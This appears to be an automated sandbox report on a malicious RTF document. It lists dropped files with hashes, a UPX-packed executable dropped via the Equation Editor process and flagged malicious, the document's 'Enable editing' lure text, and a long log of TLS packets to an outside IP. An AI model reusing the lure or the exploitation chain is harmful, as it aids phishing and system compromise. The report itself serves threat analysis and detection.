                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Mon Jun 24 15:27:02 2024, length=618938, window=hide
                                                Category:dropped
                                                Size (bytes):1014
                                                Entropy (8bit):4.564118554616871
                                                Encrypted:false
                                                SSDEEP:12:8Mg86FgXg/XAlCPCHaXZlKBSgB/BGFX+W3sfuoNDiicvbH9bI4vCDtZ3YilMMEpr:89L/XTW/bkdFOeZbiDv3qnqk7N
                                                MD5:CD629B3E1560221CE36F3F66C5C795B0
                                                SHA1:D65A0D36ED57191114409BD890EF773ADC4D6330
                                                SHA-256:EDA1C03B68779362B557B61C89BCF8030A3EFB666300BC33A12E8F512469CFDA
                                                SHA-512:DB4A7852338702C2129C47F26E6689CFB2C7A50C14DB9EEA20B2C726FF5A8811CA530486ECB363FAFB7B8AE732405668D55872463625AFBE34CF9D9B3A2DAE82
                                                Malicious:false
                                                Preview:L..................F.... ......r......r.....aXS....q...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X]...user.8......QK.X.X].*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..q...Xb. .2MBHBI~1.RTF..J.......WD..WD.*.........................2.M.b.H.B.i.q.X.H.2...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\965969\Users.user\Desktop\2MbHBiqXH2.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.M.b.H.B.i.q.X.H.2...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......965969..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Generic INItialization configuration [folders]
                                                Category:dropped
                                                Size (bytes):55
                                                Entropy (8bit):4.603998122576232
                                                Encrypted:false
                                                SSDEEP:3:H5bXLp2m4yXLp2v:HxXLpNXLpI
                                                MD5:93123BA7B281BB729F0956AED9B9E239
                                                SHA1:061A8D0029EDB2CFBC522D67CD84C49A4CCC6A01
                                                SHA-256:93E001978EB12DEA0C1288B9276BFDF8E90D863C2211223D8D7761CFB827D763
                                                SHA-512:164CEAD96BCC3BE7CAFCBCB50D9BF31CF422B02F076D41914B75D1A154E67534EBCB8164CD270CA571DBB67078067F34C24F6EE304FA6F0967720528AE48A9AA
                                                Malicious:false
                                                Preview:[misc]..2MbHBiqXH2.LNK=0..[folders]..2MbHBiqXH2.LNK=0..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.4797606462020307
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                Category:dropped
                                                Size (bytes):644096
                                                Entropy (8bit):7.796206243772775
                                                Encrypted:false
                                                SSDEEP:12288:SYV6MorX7qzuC3QHO9FQVHPF51jgcN6S5UesUInNnpo2R2:hBXu9HGaVHN6S5U5Rn/Y
                                                MD5:901A623DBCCAA22525373CD36195EE14
                                                SHA1:9ADB6DDDB68CD7E116DA9392E7EE63A8FA394495
                                                SHA-256:B5E250A95073B5DFE33F66C13CC89DA0FC8D3AF226E5EFB06BB8FCFD9A4CD6EC
                                                SHA-512:EABEBA0EB9AE7E39577A7E313E50807CEE1B888F1C8FF0FA375E5DE9451A66471C791C23EA4F4AF85151F96B065D55E8C1320026D8503A048A3E5968F8EFFC1D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Joe Sandbox View:
                                                • Filename: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc, Detection: malicious
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...."yf.........."......p...p....................@..........................p............@...@.......@.....................Dg..$.......Dg..................hk......................................t...H...........................................UPX0....................................UPX1.....p.......d..................@....rsrc....p.......l...h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                                File type:Rich Text Format data, version 1
                                                Entropy (8bit):3.5824693010060775
                                                TrID:
                                                • Rich Text Format (5005/1) 55.56%
                                                • Rich Text Format (4004/1) 44.44%
                                                File name:2MbHBiqXH2.rtf
                                                File size:618'938 bytes
                                                MD5:2d1b096a33d1b673fd06db9f3e861761
                                                SHA1:3c0a1d1bd1b54381df8769ecc173e8635fea366e
                                                SHA256:bf89362748b9e66c11aaa49ddf83b1665fe038d04225b36de4f26cffc11a0f3d
                                                SHA512:32156517472c8c4a6998e58bb90e0a684516a11c403d87524a8561f647901cdb9413dd71b55df4de52c88e5e522e06ee9565fc6dc653ec8f49ba5c58a3d5034e
                                                SSDEEP:6144:IwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAqtUn:+u
                                                TLSH:B3D4BF2DD34B02598F620377AB571E5142BDBB7EF38552A1302C537933EAC39A1252BE
                                                File Content Preview:{\rtf1..{\*\WauwWb33kVtBeFXoF5Me8bbkaCC88dqXB1LN0s84saDXfy7wNEIkF6fwo9WbTXUa8pudD9TZmbxq2sMJ09BBYE4OUwb26mMAnnIl6iE6rMnAeGPSXbh0yHxd3K6UwdemYg}..{\744345958please click Enable editing from the yellow bar above.The independent auditors. opinion says the fi
                                                Icon Hash:2764a3aaaeb7bdbf
                                                Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                00002AA78hno
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Jun 24, 2024 18:27:08.631192923 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.631223917 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.631697893 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.631747961 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.631752968 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.631763935 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.631793022 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.722158909 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.722229958 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.722273111 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.722362995 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.722362995 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.722392082 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.722554922 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.722554922 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.722667933 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.722873926 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.722873926 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.722959995 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.723105907 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.723130941 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.723138094 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.723174095 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.723174095 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.723273039 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.723326921 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.723457098 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.723612070 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.723660946 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.723660946 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.723669052 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.723728895 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.723773956 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.723920107 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.723957062 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.723963976 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.723974943 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.724049091 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.724090099 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.724090099 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.724097967 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.724204063 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.724248886 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.724248886 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.724256992 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.724344015 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.724387884 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.724387884 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.724395037 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.724504948 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.724594116 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.724601030 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.724791050 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.724824905 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.724968910 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725016117 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.725016117 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.725023985 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725122929 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725162029 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.725162029 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.725169897 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725276947 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725404978 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725435019 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.725442886 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725475073 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.725543976 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725589037 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.725589037 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.725595951 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725740910 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725790024 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.725790024 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.725796938 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.725910902 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.726070881 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.726121902 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.726121902 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.726130962 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.726229906 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.726433039 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.726496935 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.726496935 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.726505041 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.726521015 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.726686954 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.726686954 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.726695061 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.727132082 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.818145990 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.818197012 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.818497896 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.818497896 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.818520069 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.818715096 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.819374084 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.819412947 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.819448948 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.819463015 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.819475889 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.819530964 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.819636106 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.819742918 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.819791079 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.819838047 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.819844007 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.819874048 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.819874048 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.819969893 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.820177078 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.820219994 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.820230007 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.820242882 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.820275068 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.820331097 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.820382118 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.823247910 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.823364019 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.823419094 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.823419094 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.823426962 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.823573112 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.823605061 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.823605061 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.823612928 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.823652029 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.823652029 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.823687077 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.823892117 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.823936939 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.823936939 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.823944092 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.824003935 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.824198961 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.824235916 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.824235916 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.824244976 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.824275970 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.824275970 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.824315071 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.824382067 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.825141907 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.007666111 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.007713079 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.007765055 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.007765055 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.007788897 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.007920027 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.007920027 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.008018017 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.008055925 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.008066893 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.008075953 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.008127928 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.008127928 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.008351088 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.008394957 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.008394957 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.008398056 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.008409977 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.008510113 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.008759975 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.008795977 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.008832932 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.008879900 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.008879900 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.008887053 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009023905 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009027004 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.009035110 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009076118 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009121895 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.009121895 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.009129047 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009387970 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.009439945 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009475946 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009519100 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.009519100 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.009526968 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009576082 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.009727955 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009763956 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009814978 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.009814978 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.009820938 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.009881020 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.009881020 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.010241985 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.010279894 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.010322094 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.010322094 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:09.010328054 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:09.010451078 CEST49162443192.168.2.22172.67.162.95
